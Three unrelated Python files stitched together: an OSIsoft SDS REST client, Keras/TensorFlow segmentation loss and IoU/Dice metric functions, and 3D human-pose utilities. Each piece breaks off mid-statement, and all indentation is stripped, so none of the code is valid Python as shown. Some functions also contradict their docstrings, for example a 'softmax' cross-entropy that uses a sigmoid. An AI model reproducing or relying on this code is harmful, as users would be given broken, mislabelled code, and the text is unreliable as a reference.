# THE PRIOR EXPRESS WRITTEN PERMISSION OF OSIsoft, LLC.
#
# RESTRICTED RIGHTS LEGEND
# Use, duplication, or disclosure by the Government is subject to restrictions
# as set forth in subparagraph (c)(1)(ii) of the Rights in Technical Data and
# Computer Software clause at DFARS 252.227.7013
#
# OSIsoft, LLC
# 1600 Alvarado St, San Leandro, CA 94577
import urlparse
import json
import adal as adal
from SdsError import SdsError
from SdsType import SdsType
from SdsStream import SdsStream
from SdsStreamView import SdsStreamView
from SdsStreamViewMap import SdsStreamViewMap
from SdsBoundaryType import SdsBoundaryType
from Dataview import Dataview
from Datagroup import Datagroup
import requests
import time
class SdsClient(object):
"""Handles communication with Sds Service"""
def __init__(self, apiVersion, tenant, url, resource, authority, clientId, clientSecret):
self.__apiVersion = apiVersion
self.__tenant = tenant
self.__url = url
self.__resource = resource
self.__clientId = clientId
self.__clientSecret = clientSecret
self.__authority = authority
self.__token = ""
self.__expiration = 0
self.__getToken()
self.__setPathAndQueryTemplates()
@property
def Uri(self):
return self.__url
def getType(self, namespace_id, type_id):
"""Retrieves the type specified by 'type_id' from Sds Service"""
if namespace_id is None:
raise TypeError
if type_id is None:
raise TypeError
response = requests.get(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsType, {type_id}. {status}:{reason}".
format(type_id=type_id, status=response.status_code, reason=response.text))
type = SdsType.fromJson(json.loads(response.content))
response.close()
return type
def getTypeReferenceCount(self, namespace_id, type_id):
"""Retrieves the number of times the type is referenced"""
if namespace_id is None:
raise TypeError
if type_id is None:
raise TypeError
response = requests.get(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id) + "/ReferenceCount",
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsType reference count, {type_id}. {status}:{reason}".
format(type_id=type_id, status=response.status_code, reason=response.text))
count = json.loads(response.content)
response.close()
return int(count)
def getTypes(self, namespace_id, skip=0, count=100):
"""Retrieves a list of types associated with the specified 'namespace_id' under the current tenant"""
if namespace_id is None:
raise TypeError
response = requests.get(
self.__url + self.__getTypesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, skip=skip, count=count),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get all SdsTypes. {status}:{reason}".
format(status=response.status_code, reason=response.text))
types = json.loads(response.content)
results = []
for t in types:
results.append(SdsType.fromJson(t))
response.close()
return results
def getOrCreateType(self, namespace_id, type):
"""Tells Sds Service to create a type based on local 'type' or get if existing type matches"""
if namespace_id is None:
raise TypeError
if type is None or not isinstance(type, SdsType):
raise TypeError
response = requests.post(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type.Id),
data=type.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError(
"Failed to create type, {type_id}. {status}:{reason}".format(type_id=type.Id, status=response.status_code, reason=response.text))
type = SdsType.fromJson(json.loads(response.content))
response.close()
return type
def createOrUpdateType(self, namespace_id, type):
"""Tells Sds Service to create a type based on local 'type' object"""
if namespace_id is None:
raise TypeError
if type is None or not isinstance(type, SdsType):
raise TypeError
response = requests.put(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type.Id),
data=type.toJson(), headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError(
"Failed to create type, {type_id}. {status}:{reason}".format(type_id=type.Id, status=response.status_code, reason=response.text))
response.close()
def deleteType(self, namespace_id, type_id):
"""Tells Sds Service to delete the type specified by 'type_id'"""
if namespace_id is None:
raise TypeError
if type_id is None:
raise TypeError
response = requests.delete(
self.__url + self.__typesPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, type_id=type_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to delete SdsType, {type_id}. {status}:{reason}".
format(type_id=type_id, status=response.status_code, reason=response.text))
response.close()
def getStreamView(self, namespace_id, streamView_id):
"""Retrieves the streamView specified by 'streamView_id' from Sds Service"""
if namespace_id is None:
raise TypeError
if streamView_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id,
streamView_id=streamView_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
streamView = SdsStreamView.fromJson(json.loads(response.content))
response.close()
return streamView
def getStreamViewMap(self, namespace_id, streamView_id):
"""Retrieves the streamView map specified by 'streamView_id' from Sds Service"""
if namespace_id is None:
raise TypeError
if streamView_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView_id) + "/Map",
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
streamViewMap = SdsStreamViewMap.fromJson(json.loads(response.content))
response.close()
return streamViewMap
def getStreamViews(self, namespace_id, skip=0, count=100):
"""Retrieves a list of streamViews associated with the specified 'namespace_id' under the current tenant"""
if namespace_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, skip=skip, count=count),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get all SdsStreamViews. {status}:{reason}".
format(status=response.status_code, reason=response.text))
content = json.loads(response.content)
results = []
for item in content:
results.append(SdsStreamView.fromJson(item))
response.close()
return results
def getOrCreateStreamView(self, namespace_id, streamView):
"""Tells Sds Service to create a streamView based on a local SdsStreamView object"""
if namespace_id is None:
raise TypeError
if streamView is None or not isinstance(streamView, SdsStreamView):
raise TypeError
response = requests.post(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView.Id),
data=streamView.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView.Id, status=response.status_code, reason=response.text))
streamView = SdsStreamView.fromJson(json.loads(response.content))
response.close()
return streamView
def createOrUpdateStreamView(self, namespace_id, streamView):
"""Tells Sds Service to create a streamView based on a local SdsStreamView object"""
if namespace_id is None:
raise TypeError
if streamView is None or not isinstance(streamView, SdsStreamView):
raise TypeError
response = requests.put(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView.Id),
data=streamView.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView.Id, status=response.status_code, reason=response.text))
response.close()
def deleteStreamView(self, namespace_id, streamView_id):
"""Tells Sds Service to delete the streamView with the specified 'streamView_id'"""
if namespace_id is None:
raise TypeError
if streamView_id is None:
raise TypeError
response = requests.delete(
self.__url + self.__streamViewsPath.format(api_version=self.__apiVersion,tenant_id=self.__tenant, namespace_id=namespace_id, streamView_id=streamView_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to delete SdsStreamView, {streamView_id}. {status}:{reason}".
format(streamView_id=streamView_id, status=response.status_code, reason=response.text))
response.close()
def getStream(self, namespace_id, stream_id):
"""Retrieves a stream specified by 'stream_id' from the Sds Service"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
stream = SdsStream.fromJson(json.loads(response.content))
response.close()
return stream
def getStreamType(self, namespace_id, stream_id):
"""Retrieves a stream specified by 'stream_id' from the Sds Service"""
if namespace_id is None:
raise TypeError
if stream_id is None:
raise TypeError
response = requests.get(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream_id) + "/Type",
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream_id, status=response.status_code, reason=response.text))
type = SdsType.fromJson(json.loads(response.content))
response.close()
return type
def getStreams(self, namespace_id, query="", skip=0, count=100):
"""Retrieves a list of streams associated with 'namespace_id' under the current tenant"""
if namespace_id is None:
raise TypeError
if query is None:
raise TypeError
response = requests.get(
self.__url + self.__getStreamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, query=query, skip=skip, count=count),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to get all SdsStreams. {status}:{reason}".
format(status=response.status_code, reason=response.text))
content = json.loads(response.content)
results = []
for item in content:
results.append(SdsStream.fromJson(item))
response.close()
return results
def getOrCreateStream(self, namespace_id, stream):
"""Tells Sds Service to create a stream based on the local 'stream' SdsStream object"""
if namespace_id is None:
raise TypeError
if stream is None or not isinstance(stream, SdsStream):
raise TypeError
response = requests.post(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream.Id),
data=stream.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream.Id, status=response.status_code, reason=response.text))
stream = SdsStream.fromJson(json.loads(response.content))
response.close()
return stream
def createOrUpdateStream(self, namespace_id, stream):
"""Tells Sds Service to create a stream based on the local 'stream' SdsStream object"""
if namespace_id is None:
raise TypeError
if stream is None or not isinstance(stream, SdsStream):
raise TypeError
response = requests.put(
self.__url + self.__streamsPath.format(api_version=self.__apiVersion, tenant_id=self.__tenant, namespace_id=namespace_id, stream_id=stream.Id),
data=stream.toJson(),
headers=self.__sdsHeaders())
if response.status_code < 200 or response.status_code >= 300:
response.close()
raise SdsError("Failed to create SdsStream, {stream_id}. {status}:{reason}".
format(stream_id=stream.Id, status=response.status_code, reason=response.text))
response.close()
def deleteStream(self, namespace_id, stream_id):
"""Tells Sds Service to delete the stream speficied by 'stream_id'"""
if namespace_id is | |
from keras import backend as K
import tensorflow as tf
import numpy as np
def focal_loss(gamma=2., alpha=4.):
gamma = float(gamma)
alpha = float(alpha)
def focal_loss_fixed(y_true, y_pred):
"""Focal loss for multi-classification
FL(p_t)=-alpha(1-p_t)^{gamma}ln(p_t)
Notice: y_pred is probability after softmax
gradient is d(Fl)/d(p_t) not d(Fl)/d(x) as described in paper
d(Fl)/d(p_t) * [p_t(1-p_t)] = d(Fl)/d(x)
Focal Loss for Dense Object Detection
https://arxiv.org/abs/1708.02002
Arguments:
y_true {tensor} -- ground truth labels, shape of [batch_size, num_cls]
y_pred {tensor} -- model's output, shape of [batch_size, num_cls]
Keyword Arguments:
gamma {float} -- (default: {2.0})
alpha {float} -- (default: {4.0})
Returns:
[tensor] -- loss.
"""
epsilon = 1.e-9
y_true = tf.convert_to_tensor(y_true, tf.float32)
y_pred = tf.convert_to_tensor(y_pred, tf.float32)
model_out = tf.add(y_pred, epsilon)
ce = tf.multiply(y_true, -tf.log(model_out))
weight = tf.multiply(y_true, tf.pow(tf.subtract(1., model_out), gamma))
fl = tf.multiply(alpha, tf.multiply(weight, ce))
reduced_fl = tf.reduce_max(fl, axis=1)
return tf.reduce_mean(reduced_fl)
return focal_loss_fixed
def weighted_categorical_crossentropy(weights=None):
""" weighted_categorical_crossentropy
Args:
* weights<ktensor|nparray|list>: crossentropy weights
Returns:
* weighted categorical crossentropy function
"""
def loss(y_true, y_pred):
labels_floats = tf.cast(y_true, tf.float32)
per_pixel_loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels_floats,logits=y_pred)
if weights is not None:
weight_mask = tf.maximum(tf.reduce_max(tf.constant(
np.array(weights, dtype=np.float32)[None, None, None])
* labels_floats, axis=-1), 1.0)
per_pixel_loss = per_pixel_loss * weight_mask[:, :, :, None]
return tf.reduce_mean(per_pixel_loss)
return loss
def image_categorical_cross_entropy(y_true, y_pred, weights=None):
"""
:param y_true: tensor of shape (batch_size, height, width) representing the ground truth.
:param y_pred: tensor of shape (batch_size, height, width) representing the prediction.
:return: The mean cross-entropy on softmaxed tensors.
"""
labels_floats = tf.cast(y_true, tf.float32)
per_pixel_loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=labels_floats,logits=y_pred)
if weights is not None:
weight_mask = tf.maximum(
tf.reduce_max(tf.constant(
np.array(weights, dtype=np.float32)[None, None, None])
* labels_floats, axis=-1), 1.0)
per_pixel_loss = per_pixel_loss * weight_mask[:, :, :, None]
return tf.reduce_mean(per_pixel_loss)
def class_tversky(y_true, y_pred):
smooth = 1.0#1.00
y_true = K.permute_dimensions(y_true, (3,1,2,0))
y_pred = K.permute_dimensions(y_pred, (3,1,2,0))
y_true_pos = K.batch_flatten(y_true)
y_pred_pos = K.batch_flatten(y_pred)
true_pos = K.sum(y_true_pos * y_pred_pos, 1)
false_neg = K.sum(y_true_pos * (1-y_pred_pos), 1)
false_pos = K.sum((1-y_true_pos)*y_pred_pos, 1)
alpha = 0.2#0.5
beta=0.8
return (true_pos + smooth)/(true_pos + alpha*false_neg + (beta)*false_pos + smooth)
def focal_tversky_loss(y_true,y_pred):
pt_1 = class_tversky(y_true, y_pred)
gamma =1.3#4./3.0#1.3#4.0/3.00# 0.75
return K.sum(K.pow((1-pt_1), gamma))
def generalized_dice_coeff2(y_true, y_pred):
n_el = 1
for dim in y_true.shape:
n_el *= int(dim)
n_cl = y_true.shape[-1]
w = K.zeros(shape=(n_cl,))
w = (K.sum(y_true, axis=(0,1,2)))/(n_el)
w = 1/(w**2+0.000001)
numerator = y_true*y_pred
numerator = w*K.sum(numerator,(0,1,2))
numerator = K.sum(numerator)
denominator = y_true+y_pred
denominator = w*K.sum(denominator,(0,1,2))
denominator = K.sum(denominator)
return 2*numerator/denominator
def generalized_dice_coeff(y_true, y_pred):
axes = tuple(range(1, len(y_pred.shape)-1))
Ncl = y_pred.shape[-1]
w = K.zeros(shape=(Ncl,))
w = K.sum(y_true, axis=axes)
w = 1/(w**2+0.000001)
# Compute gen dice coef:
numerator = y_true*y_pred
numerator = w*K.sum(numerator,axes)
numerator = K.sum(numerator)
denominator = y_true+y_pred
denominator = w*K.sum(denominator,axes)
denominator = K.sum(denominator)
gen_dice_coef = 2*numerator/denominator
return gen_dice_coef
def generalized_dice_loss(y_true, y_pred):
return 1 - generalized_dice_coeff2(y_true, y_pred)
def soft_dice_loss(y_true, y_pred, epsilon=1e-6):
'''
Soft dice loss calculation for arbitrary batch size, number of classes, and number of spatial dimensions.
Assumes the `channels_last` format.
# Arguments
y_true: b x X x Y( x Z...) x c One hot encoding of ground truth
y_pred: b x X x Y( x Z...) x c Network output, must sum to 1 over c channel (such as after softmax)
epsilon: Used for numerical stability to avoid divide by zero errors
# References
V-Net: Fully Convolutional Neural Networks for Volumetric Medical Image Segmentation
https://arxiv.org/abs/1606.04797
More details on Dice loss formulation
https://mediatum.ub.tum.de/doc/1395260/1395260.pdf (page 72)
Adapted from https://github.com/Lasagne/Recipes/issues/99#issuecomment-347775022
'''
# skip the batch and class axis for calculating Dice score
axes = tuple(range(1, len(y_pred.shape)-1))
numerator = 2. * K.sum(y_pred * y_true, axes)
denominator = K.sum(K.square(y_pred) + K.square(y_true), axes)
return 1.00 - K.mean(numerator / (denominator + epsilon)) # average over classes and batch
def seg_metrics(y_true, y_pred, metric_name, metric_type='standard', drop_last = True, mean_per_class=False, verbose=False):
"""
Compute mean metrics of two segmentation masks, via Keras.
IoU(A,B) = |A & B| / (| A U B|)
Dice(A,B) = 2*|A & B| / (|A| + |B|)
Args:
y_true: true masks, one-hot encoded.
y_pred: predicted masks, either softmax outputs, or one-hot encoded.
metric_name: metric to be computed, either 'iou' or 'dice'.
metric_type: one of 'standard' (default), 'soft', 'naive'.
In the standard version, y_pred is one-hot encoded and the mean
is taken only over classes that are present (in y_true or y_pred).
The 'soft' version of the metrics are computed without one-hot
encoding y_pred.
The 'naive' version return mean metrics where absent classes contribute
to the class mean as 1.0 (instead of being dropped from the mean).
drop_last = True: boolean flag to drop last class (usually reserved
for background class in semantic segmentation)
mean_per_class = False: return mean along batch axis for each class.
verbose = False: print intermediate results such as intersection, union
(as number of pixels).
Returns:
IoU/Dice of y_true and y_pred, as a float, unless mean_per_class == True
in which case it returns the per-class metric, averaged over the batch.
Inputs are B*W*H*N tensors, with
B = batch size,
W = width,
H = height,
N = number of classes
"""
flag_soft = (metric_type == 'soft')
flag_naive_mean = (metric_type == 'naive')
# always assume one or more classes
num_classes = K.shape(y_true)[-1]
if not flag_soft:
# get one-hot encoded masks from y_pred (true masks should already be one-hot)
y_pred = K.one_hot(K.argmax(y_pred), num_classes)
y_true = K.one_hot(K.argmax(y_true), num_classes)
# if already one-hot, could have skipped above command
# keras uses float32 instead of float64, would give error down (but numpy arrays or keras.to_categorical gives float64)
y_true = K.cast(y_true, 'float32')
y_pred = K.cast(y_pred, 'float32')
# intersection and union shapes are batch_size * n_classes (values = area in pixels)
axes = (1,2) # W,H axes of each image
intersection = K.sum(K.abs(y_true * y_pred), axis=axes)
mask_sum = K.sum(K.abs(y_true), axis=axes) + K.sum(K.abs(y_pred), axis=axes)
union = mask_sum - intersection # or, np.logical_or(y_pred, y_true) for one-hot
smooth = .001
iou = (intersection + smooth) / (union + smooth)
dice = 2 * (intersection + smooth)/(mask_sum + smooth)
metric = {'iou': iou, 'dice': dice}[metric_name]
# define mask to be 0 when no pixels are present in either y_true or y_pred, 1 otherwise
mask = K.cast(K.not_equal(union, 0), 'float32')
if drop_last:
metric = metric[:,:-1]
mask = mask[:,:-1]
if verbose:
print('intersection, union')
print(K.eval(intersection), K.eval(union))
print(K.eval(intersection/union))
# return mean metrics: remaining axes are (batch, classes)
if flag_naive_mean:
return K.mean(metric)
# take mean only over non-absent classes
class_count = K.sum(mask, axis=0)
non_zero = tf.greater(class_count, 0)
non_zero_sum = tf.boolean_mask(K.sum(metric * mask, axis=0), non_zero)
non_zero_count = tf.boolean_mask(class_count, non_zero)
if verbose:
print('Counts of inputs with class present, metrics for non-absent classes')
print(K.eval(class_count), K.eval(non_zero_sum / non_zero_count))
return K.mean(non_zero_sum / non_zero_count)
def mean_iou(y_true, y_pred, **kwargs):
"""
Compute mean Intersection over Union of two segmentation masks, via Keras.
Calls metrics_k(y_true, y_pred, metric_name='iou'), see there for allowed kwargs.
"""
return seg_metrics(y_true, y_pred, metric_name='iou', **kwargs)
def Mean_IOU(y_true, y_pred):
nb_classes = K.int_shape(y_pred)[-1]
iou = []
true_pixels = K.argmax(y_true, axis=-1)
pred_pixels = K.argmax(y_pred, axis=-1)
void_labels = K.equal(K.sum(y_true, axis=-1), 0)
for i in range(0, nb_classes): # exclude first label (background) and last label (void)
true_labels = K.equal(true_pixels, i)# & ~void_labels
pred_labels = K.equal(pred_pixels, i)# & ~void_labels
inter = tf.to_int32(true_labels & pred_labels)
union = tf.to_int32(true_labels | pred_labels)
legal_batches = K.sum(tf.to_int32(true_labels), axis=1)>0
ious = K.sum(inter, axis=1)/K.sum(union, axis=1)
iou.append(K.mean(tf.gather(ious, indices=tf.where(legal_batches)))) # returns average IoU of the same objects
iou = tf.stack(iou)
legal_labels = ~tf.debugging.is_nan(iou)
iou = tf.gather(iou, indices=tf.where(legal_labels))
return K.mean(iou)
def iou_vahid(y_true, y_pred):
nb_classes = tf.shape(y_true)[-1]+tf.to_int32(1)
true_pixels = K.argmax(y_true, axis=-1)
pred_pixels = K.argmax(y_pred, axis=-1)
iou = []
for i in tf.range(nb_classes):
tp=K.sum( tf.to_int32( K.equal(true_pixels, i) & K.equal(pred_pixels, i) ) )
fp=K.sum( tf.to_int32( K.not_equal(true_pixels, i) & K.equal(pred_pixels, i) ) )
fn=K.sum( tf.to_int32( K.equal(true_pixels, i) & K.not_equal(pred_pixels, i) ) )
iouh=tp/(tp+fp+fn)
iou.append(iouh)
return K.mean(iou)
def IoU_metric(Yi,y_predi):
## mean Intersection over Union
## Mean IoU = TP/(FN + TP + FP)
y_predi = np.argmax(y_predi, axis=3)
y_testi = np.argmax(Yi, axis=3)
IoUs = []
Nclass = int(np.max(Yi)) + 1
for c in range(Nclass):
TP = np.sum( (Yi == c)&(y_predi==c) )
FP = np.sum( (Yi != c)&(y_predi==c) )
FN = np.sum( (Yi == c)&(y_predi != c))
IoU | |
""" General Utilities file. """
import sys
import os
############################ NON-TF UTILS ##########################
from skimage.util import img_as_float
import numpy as np
import cv2
import pickle
from PIL import Image
from io import BytesIO
import math
import tqdm
import scipy
import json
import matplotlib
gui_env = ['Agg','TKAgg','GTKAgg','Qt4Agg','WXAgg']
for gui in gui_env:
try:
print ("testing", gui)
matplotlib.use(gui,warn=False, force=True)
from matplotlib import pyplot as plt
break
except:
continue
print ("utils.py Using:",matplotlib.get_backend())
from matplotlib.backends.backend_agg import FigureCanvasAgg as Canvas
from mpl_toolkits.mplot3d import Axes3D
import config as cfg
######### Basic Utils #########
def adjust_gamma(image, gamma=1.0):
""" Gamma correct images. """
## Build a LUT mapping the pixel values [0, 255] to their adjusted gamma values
invGamma = 1.0 / gamma
table = np.array([((i / 255.0) ** invGamma) * 255
for i in np.arange(0, 256)]).astype("uint8")
## Apply gamma correction using the LUT
return cv2.LUT(image, table)
def scipy_sharpen(img_flt, alpha=30):
""" Sharpen images. """
from scipy import ndimage
blurred_f = ndimage.gaussian_filter(img_flt, 3)
filter_blurred_f = ndimage.gaussian_filter(blurred_f, 1)
img_flt = blurred_f + alpha * (blurred_f - filter_blurred_f)
return img_flt
def read_pickle(path):
""" Load Pickle file. """
with open(path, 'rb') as f:
data = pickle.load(f)
return data
def save_pickle(data, path):
""" Save Pickle file. """
with open(path, 'wb') as f:
pickle.dump(data, f, protocol=pickle.HIGHEST_PROTOCOL)
######### Pose quality and Metrics #########
def compute_similarity_transform(S1, S2):
""" Computes a similarity transform (sR, t) that takes
a set of 3D points S1 (3 x N) closest to a set of 3D points S2,
where R is an 3x3 rotation matrix, t 3x1 translation, s scale.
i.e. solves the orthogonal Procrutes problem. """
transposed = False
if S1.shape[0] != 3 and S2.shape[0] != 3:
S1 = S1.T
S2 = S2.T
transposed = True
assert(S2.shape[1] == S1.shape[1])
## Mean
mu1 = S1.mean(axis=1, keepdims=True)
mu2 = S2.mean(axis=1, keepdims=True)
X1 = S1 - mu1
X2 = S2 - mu2
## Compute variance of X1 used for scale
var1 = np.sum(X1**2)
## The outer product of X1 and X2
K = X1.dot(X2.T)
## Solution that Maximizes trace(R'K) is R=U*V', where U, V are
## Singular vectors of K
U, s, Vh = np.linalg.svd(K)
V = Vh.T
## Construct Z that fixes the orientation of R to get det(R)=1
Z = np.eye(U.shape[0])
Z[-1, -1] *= np.sign(np.linalg.det(U.dot(V.T)))
## Construct R
R = V.dot(Z.dot(U.T))
## Recover scale
scale = np.trace(R.dot(K)) / var1
## Recover translation
t = mu2 - scale*(R.dot(mu1))
## Error
S1_hat = scale*R.dot(S1) + t
if transposed:
S1_hat = S1_hat.T
return S1_hat
def compute_error(pred_3d_all, gt_3d_all, full_out=True):
""" MPJPE and PA_MPJPE metric computation. """
pred_3d_all_flat = pred_3d_all.copy()
pred_3d_all_flat = pred_3d_all_flat - pred_3d_all_flat[:, 0:1,:]
gt_3d_all_flat = gt_3d_all.copy()
gt_3d_all_flat = gt_3d_all_flat - gt_3d_all_flat[:, 0:1,:]
joint_wise_error = []
error = []
pa_joint_wise_error = []
pa_error = []
for i in range(len(pred_3d_all_flat)):
each_pred_3d = pred_3d_all_flat[i]
each_gt_3d = gt_3d_all_flat[i]
tmp_err = np.linalg.norm(each_pred_3d-each_gt_3d, axis=1)
joint_wise_error.append(tmp_err)
error.append(np.mean(tmp_err))
pred3d_sym = compute_similarity_transform(each_pred_3d.copy(), each_gt_3d.copy())
tmp_pa_err = np.linalg.norm(pred3d_sym-each_gt_3d, axis=1)
pa_joint_wise_error.append(tmp_pa_err)
pa_error.append(np.mean(tmp_pa_err))
joint_wise_error = np.array(joint_wise_error)
if(full_out):
mpjpe = np.mean(error)*1000 ### Note: unit is mm
pampjpe = np.mean(pa_error)*1000 ### Note: unit is mm
return mpjpe, pampjpe
else:
return error, pa_error
###### Alternative manual regressors ######
def smplx45_to_17j(pose_smpl):
""" SMPLX 45 joint J3D to 17 joint J3D. """
## Remove fingers
pose_smpl = pose_smpl[:-10]
## Remove extra def feet
pose_smpl = pose_smpl[:-6]
## Remove face
pose_smpl = pose_smpl[:-5]
## Remove wrist
pose_smpl = pose_smpl[:-2]
## Remove extra def spine
pose_smpl = np.delete(pose_smpl, 3, 0) ## 3
pose_smpl = np.delete(pose_smpl, 5, 0) ## 6
pose_smpl = np.delete(pose_smpl, 7, 0) ## 9
## Remove torso
pose_smpl = np.delete(pose_smpl, 10, 0) ## 10
pose_smpl = np.delete(pose_smpl, 10, 0) ## 11
## Hip altitude increase and widen
alt_f = 0.8
wide_f = 8.0
pelvis = pose_smpl[0].copy()
r_hip = pose_smpl[2].copy()
l_hip = pose_smpl[1].copy()
## Alt inc
r_p_dir = pelvis - r_hip
l_p_dir = pelvis - l_hip
mag_rp = np.linalg.norm(r_p_dir)
r_p_dir /= mag_rp
mag_lp = np.linalg.norm(l_p_dir)
l_p_dir /= mag_lp
r_hip = r_hip + (r_p_dir*mag_rp*alt_f)
l_hip = l_hip + (l_p_dir*mag_lp*alt_f)
## H-Widen
hip_ctr = (r_hip + l_hip) / 2.0
r_dir = r_hip - hip_ctr
l_dir = l_hip - hip_ctr
## Unit vec
mag = np.linalg.norm(r_dir)
r_dir /= mag
l_dir /= np.linalg.norm(l_dir)
r_hip = r_hip + (r_dir*mag*wide_f)
l_hip = l_hip + (l_dir*mag*wide_f)
## place back
pose_smpl[2] = r_hip
pose_smpl[1] = l_hip
return pose_smpl
def smpl23_to_17j_3d(pose_smpl):
""" Simple SMPL 23 joint J3D to 17 joint J3D. """
smpl_to_17j = [ [0,1],[8,11],
[12],[17],[19], ### or 15 , 17
[13],[18], [20], ### or 16 , 18
[14],[0],[3],
[9,6],[9],[1],
[4],[10,7],[10] ]
pose_17j = np.zeros((len(smpl_to_17j),3))
for idx in range(len(smpl_to_17j)):
sel_idx = smpl_to_17j[idx]
if(len(sel_idx) == 2):
pose_17j[idx] = (pose_smpl[sel_idx[0]] + pose_smpl[sel_idx[1]]) / 2.0
else:
pose_17j[idx] = pose_smpl[sel_idx[0]]
return pose_17j
""" SMPL J17 reordering vec. """
smpl_reorder_vec = [0, 9,
12, 14, 16,
11, 13, 15,
10,
2, 4, 6, 8,
1, 3, 5, 7 ]
def reorder_smpl17_to_j17(pose_3d):
""" SMPL reorder SMPL J17 to standard J17. """
pose_3d = pose_3d[smpl_reorder_vec]
return pose_3d
def smpl24_to_17j_adv(pose_smpl):
""" Improved SMPL 23 joint J3D to 17 joint J3D. """
## Hip altitude increase and widen
alt_f = 0.8
wide_f = 8.0
pelvis = pose_smpl[0].copy()
r_hip = pose_smpl[2].copy()
l_hip = pose_smpl[1].copy()
## Alt inc
r_p_dir = pelvis - r_hip
l_p_dir = pelvis - l_hip
mag_rp = np.linalg.norm(r_p_dir)
r_p_dir /= mag_rp
mag_lp = np.linalg.norm(l_p_dir)
l_p_dir /= mag_lp
r_hip = r_hip + (r_p_dir*mag_rp*alt_f)
l_hip = l_hip + (l_p_dir*mag_lp*alt_f)
## H-Widen
hip_ctr = (r_hip + l_hip) / 2.0
r_dir = r_hip - hip_ctr
l_dir = l_hip - hip_ctr
## Unit vec
mag = np.linalg.norm(r_dir)
r_dir /= mag
l_dir /= np.linalg.norm(l_dir)
r_hip = r_hip + (r_dir*mag*wide_f)
l_hip = l_hip + (l_dir*mag*wide_f)
## Place back
pose_smpl[2] = r_hip
pose_smpl[1] = l_hip
## Neck to head raise with tilt towards nose
alt_f = 0.7
head = pose_smpl[15].copy()
neck = pose_smpl[12].copy()
## Alt inc
n_h_dir = head - neck
mag_nh = np.linalg.norm(n_h_dir)
n_h_dir /= mag_nh
head = head + (n_h_dir*mag_nh*alt_f)
## Place back
pose_smpl[15] = head
## Remove wrist
pose_smpl = pose_smpl[:-2]
## Remove extra def spine
pose_smpl = np.delete(pose_smpl, 3, 0) ## 3
pose_smpl = np.delete(pose_smpl, 5, 0) ## 6
pose_smpl = np.delete(pose_smpl, 7, 0) ## 9
## Remove torso
pose_smpl = np.delete(pose_smpl, 10, 0) ## 10
pose_smpl = np.delete(pose_smpl, 10, 0) ## 11
return pose_smpl
def hip_straighten(pose_smpl):
""" Straighten Hip in J17. """
